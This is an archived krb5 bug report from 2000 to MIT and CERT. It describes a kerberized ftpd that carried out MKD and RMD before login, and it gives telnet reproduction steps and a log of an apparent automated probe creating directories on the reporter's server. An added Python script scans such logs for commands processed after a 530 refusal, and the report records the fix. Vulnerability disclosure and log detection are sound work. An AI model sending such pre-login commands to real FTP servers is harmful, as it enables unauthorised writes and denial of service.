
From Christopher@tfjc.com Wed Jun 14 02:33:31 2000
Received: from fort-point-station.mit.edu (FORT-POINT-STATION.MIT.EDU [18.72.0.53])
by rt-11.mit.edu (8.9.3/8.9.3) with ESMTP id CAA06383
for <bugs@RT-11.MIT.EDU>; Wed, 14 Jun 2000 02:33:27 -0400 (EDT)
Received: from Sally.TfJC.Com (sally.tfjc.com [216.32.33.239] (may be forged))
by fort-point-station.mit.edu (8.9.2/8.9.2) with ESMTP id CAA01618
for <krb5-bugs@mit.edu>; Wed, 14 Jun 2000 02:33:24 -0400 (EDT)
Received: from Shelby.TfJC (Shelby.TfJC [192.168.50.3])
by Sally.TfJC.Com (8.9.3/8.8.7) with ESMTP id XAA30111;
Tue, 13 Jun 2000 23:33:15 -0700
Received: from Mail.TfJC.Com (localhost.localdomain [127.0.0.1])
by Shelby.TfJC (8.9.3/8.8.7) with ESMTP id XAA01947;
Tue, 13 Jun 2000 23:33:13 -0700
Message-Id: <39472721.EBFD36DD@Mail.TfJC.Com>
Date: Tue, 13 Jun 2000 23:33:05 -0700
From: "Christopher R. Thompson" <Christopher@tfjc.com>
Sender: Chris@tfjc.com
To: krb5-bugs@mit.edu, "cert@cert.org" <cert@cert.org>
Subject: Ftp Security Bug. krb5-1.1.1

>Number: 858
>Category: krb5-appl
>Synopsis: Ftp Security Bug. krb5-1.1.1
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: tlyu
>State: closed
>Class: sw-bug
>Submitter-Id: unknown
>Arrival-Date: Wed Jun 14 02:34:00 EDT 2000
>Last-Modified: Mon Jul 9 16:46:55 EDT 2001
>Originator: "Christopher R. Thompson" <Christopher@tfjc.com>
>Organization:
>Release: krb5-1.1.1
>Environment:
>Description:
This is a multi-part message in MIME format.
--------------F7615CA233D622EED70B9E28
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hackers have been busy the last month trying to get into my kerberized
ftp site and Saturday while I was away someone managed to actually
create a directory as root in my / "root" directory. This was achieved
with the MKD command and is reproducible with the following commands.

telnet host 21
mkd test1
mkd test2
rmd test1
quit


"host" now contains the directory named "/test1". Directory "/test2" was
created and then deleted. Following each mkd/rmd command the ftpd host
requests "530 please login with USER and PASS." and then either "257 MKD
command successful." or "250 RMD command successful."

I have not examined the ftpd code yet but I can only hope this is the
only hole. Making and deleting directory entries is rather benign but
some unscrupulous hacker could engineer a DOS attack on unsuspecting ftp
hosts.

Note the attached FTP LOG. These appear to be automated scripts and are
a regular daily and weekly occurrence for me here.
--------------F7615CA233D622EED70B9E28
Content-Type: text/plain; charset=us-ascii;
name="test"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="test"

Jun 10 05:08:59 sally ftpd[21432]: connect from 129.125.104.178
Jun 10 05:08:59 sally ftpd[21432]: connection from 129.125.104.178 (flits104-178.flits.rug.nl) at Sat Jun 10 05:08:59 2000
Jun 10 05:08:59 sally ftpd[21432]: <--- 220
Jun 10 05:08:59 sally ftpd[21432]: Sally.TfJC.Com FTP server (Version 5.60) ready.
Jun 10 05:08:59 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:08:59 sally ftpd[21432]: <--- 530
Jun 10 05:08:59 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:08:59 sally ftpd[21432]: <--- 257
Jun 10 05:08:59 sally ftpd[21432]: MKD command successful.
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD /incoming/>(16)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: <--- 550
Jun 10 05:09:00 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD /upload/>(14)
Jun 10 05:09:00 sally ftpd[21432]: <--- 530
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: <--- 550
Jun 10 05:09:01 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:01 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: command: <CWD /_vti_pvt/>(16)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:01 sally ftpd[21432]: <--- 550
Jun 10 05:09:01 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:01 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:01 sally ftpd[21432]: <--- 530
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: command: <CWD /_vti_txt/>(16)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: <--- 550
Jun 10 05:09:02 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:02 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:02 sally ftpd[21432]: command: <CWD /_vti_log/>(16)
Jun 10 05:09:02 sally ftpd[21432]: <--- 530
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: <--- 550
Jun 10 05:09:03 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:03 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: command: <CWD /wwwroot/>(15)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:03 sally ftpd[21432]: <--- 550
Jun 10 05:09:03 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:03 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:03 sally ftpd[21432]: <--- 530
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: command: <CWD /anonymous/>(17)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: <--- 550
Jun 10 05:09:04 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:04 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:04 sally ftpd[21432]: command: <CWD /public/>(14)
Jun 10 05:09:04 sally ftpd[21432]: <--- 530
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: <--- 550
Jun 10 05:09:05 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:05 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: command: <CWD /outgoing/>(16)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:05 sally ftpd[21432]: <--- 550
Jun 10 05:09:05 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:05 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:05 sally ftpd[21432]: <--- 530
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: command: <CWD /cgi-bin/>(15)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: <--- 550
Jun 10 05:09:06 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:06 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:06 sally ftpd[21432]: command: <CWD /tmp/>(11)
Jun 10 05:09:06 sally ftpd[21432]: <--- 530
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: <--- 550
Jun 10 05:09:07 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:07 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: command: <CWD /anonymous/_vti_pvt/>(26)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:07 sally ftpd[21432]: <--- 550
Jun 10 05:09:07 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:07 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:07 sally ftpd[21432]: <--- 530
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: command: <CWD /anonymous/incoming/>(26)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: <--- 550
Jun 10 05:09:08 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:08 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:08 sally ftpd[21432]: command: <CWD /mailroot/>(16)
Jun 10 05:09:08 sally ftpd[21432]: <--- 530
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: <--- 550
Jun 10 05:09:09 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:09 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: command: <CWD /ftproot/>(15)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:09 sally ftpd[21432]: <--- 550
Jun 10 05:09:09 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:09 sally ftpd[21432]: command: <CWD />(7)
Jun 10 05:09:09 sally ftpd[21432]: <--- 530
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:10 sally ftpd[21432]: command: <CWD /anonymous/pub/>(21)
Jun 10 05:09:10 sally ftpd[21432]: <--- 530
Jun 10 05:09:10 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:10 sally ftpd[21432]: command: <MKD test345>(13)
Jun 10 05:09:10 sally ftpd[21432]: <--- 530
Jun 10 05:09:10 sally ftpd[21432]: Please login with USER and PASS.
Jun 10 05:09:10 sally ftpd[21432]: <--- 550
Jun 10 05:09:10 sally ftpd[21432]: test345: File exists.
Jun 10 05:09:10 sally ftpd[21432]: atmark: c=-1
Jun 10 05:09:10 sally ftpd[21432]: lost connection

--------------F7615CA233D622EED70B9E28--
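
The pattern visible in the attached log, a 530 refusal followed by a second reply to the same command, can be searched for mechanically. The following is an added example, not part of the original report or of the krb5 code; it assumes the ftpd debug-log line format shown above, and its sample lines (host name, PIDs, address) are constructed.

```python
import re

# Constructed sample in the attached log's format (host, PIDs, address are made up).
SAMPLE_LOG = """\
Jun 10 05:08:59 host ftpd[101]: connect from 192.0.2.10
Jun 10 05:08:59 host ftpd[101]: <--- 220
Jun 10 05:08:59 host ftpd[101]: command: <MKD test345>(13)
Jun 10 05:08:59 host ftpd[101]: <--- 530
Jun 10 05:08:59 host ftpd[101]: Please login with USER and PASS.
Jun 10 05:08:59 host ftpd[101]: <--- 257
Jun 10 05:08:59 host ftpd[101]: MKD command successful.
Jun 10 05:09:00 host ftpd[101]: command: <CWD /incoming/>(16)
Jun 10 05:09:00 host ftpd[101]: <--- 530
Jun 10 05:09:00 host ftpd[101]: Please login with USER and PASS.
Jun 10 05:09:00 host ftpd[101]: command: <MKD test345>(13)
Jun 10 05:09:00 host ftpd[101]: <--- 530
Jun 10 05:09:00 host ftpd[101]: <--- 550
Jun 10 05:09:00 host ftpd[101]: test345: File exists.
Jun 10 05:09:01 host ftpd[102]: command: <MKD x>(7)
Jun 10 05:09:01 host ftpd[102]: <--- 530
"""

LINE = re.compile(r"ftpd\[(\d+)\]: (?:command: <(.*)>\(\d+\)|<--- (\d{3}))\s*$")

def find_processed_after_530(log_text):
    """Return (pid, command, reply_codes) for each command that got a 530
    (not logged in) and then a further reply, i.e. the server kept
    processing a request it had just refused."""
    pending, hits = {}, []   # pending: pid -> (command, [reply codes])

    def flush(pid):
        cmd, codes = pending.pop(pid, (None, []))
        if cmd and "530" in codes and codes.index("530") < len(codes) - 1:
            hits.append((pid, cmd, codes))

    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue                      # reply text, connect lines, etc.
        pid, cmd, code = m.groups()
        if cmd is not None:               # new command closes the previous one
            flush(pid)
            pending[pid] = (cmd, [])
        elif pid in pending:              # reply code for the current command
            pending[pid][1].append(code)
    for pid in list(pending):
        flush(pid)
    return hits

def executed(hits):
    """Subset of hits whose final reply is a 2xx success code."""
    return [h for h in hits if h[2][-1].startswith("2")]
```

A hit ending in 2xx means the command ran without a login; a hit ending in another code, such as the 550 "File exists" replies in the log, still shows the request reached the filesystem.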

>How-To-Repeat:
>Fix:
>Audit-Trail:

Responsible-Changed-From-To: gnats-admin->krb5-unassigned
Responsible-Changed-By: raeburn
Responsible-Changed-When: Sat Jun 23 01:37:25 2001
Responsible-Changed-Why:

Responsible-Changed-From-To: krb5-unassigned->tlyu
Responsible-Changed-By: raeburn
Responsible-Changed-When: Mon Jul 9 16:42:02 2001
Responsible-Changed-Why:

I *think* this is one of the ones you plugged a while back. Please
confirm it and close this PR if appropriate...

State-Changed-From-To: open-closed
State-Changed-By: tlyu
State-Changed-When: Mon Jul 9 16:46:28 2001
State-Changed-Why:

This has been fixed a while ago. The 1.2.2 release should have a fix
for it, among many other things.

>Unformatted: